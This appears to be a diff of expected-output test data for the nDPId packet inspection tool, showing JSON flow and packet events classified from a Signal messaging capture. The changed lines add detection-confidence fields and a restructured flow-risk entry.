 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73r7gO6oYx92viqAScSBHlgAAAgQFrAQCCAqWTmoXKFWSTQEDAwc="}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":193,"pkt_l4_len":159,"ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAACz4rsAAEAREhzAqAIBwKgCEQA128cAn9JUAMGBgAABAAYAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAcAMAAEAAQAAAB0ABDavL27ADAABAAEAAAAdAAQi4fCtwAwAAQABAAAAHQAEaxdHWcAMAAEAAQAAAB0ABCOpAyjADAABAAEAAAAdAAQ0zyk7wAwAAQABAAAAHQAENMjD8Q=="}
-00769{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1569051264113,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.175.47.110"}}
+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"ts_msec":1569051264113,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.175.47.110"}}
 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569051264115,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1569051264115,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4YPoAAEABlGjAqAIRwKgCAQMDIGEAAAAARQAAs+K7AABAERIcwKgCAcCoAhEANdvHAJ8AAA=="}
-00592{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498}
+00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1569051264116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051264116,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN6+AbvH3a+K4DuqGYAQBAvjSwAAAQEICihVknGWTmoX"}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569051264185,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051264185,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG7wEvNn9QhBdFlyaASaN\/LpgAAAgQFrAQCCApkFUBJKFWN0AEDAwg="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1569051264186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051264186,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKMBLAbsF0WXJzZ\/UIoAQCBZawQAAAQEICihVjkRkFUBJ"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569051264198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051264198,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73r+o1iHY6c+USqASaN9tOAAAAgQFrAQCCApkFUBMKFWSWgEDAwg="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sBFykuNjtdEXqASaN9RcQAAAgQFrAQCCApkFUBNKFWSWwEDAwg="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sEV2c5FmCCLjaASaN+uMAAAAgQFrAQCCApkFUBNKFWSWwEDAwg="}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN6\/Abvpz5RKqNYh2YAQBAsAMQAAAQEICihVkvtkFUBM"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7AAbuO10ReRcpLjoAQBAvkagAAAQEICihVkvtkFUBN"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7BAbuYIIuNFdnORoAQBAtBKQAAAQEICihVkvxkFUBN"}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
-00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
-00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
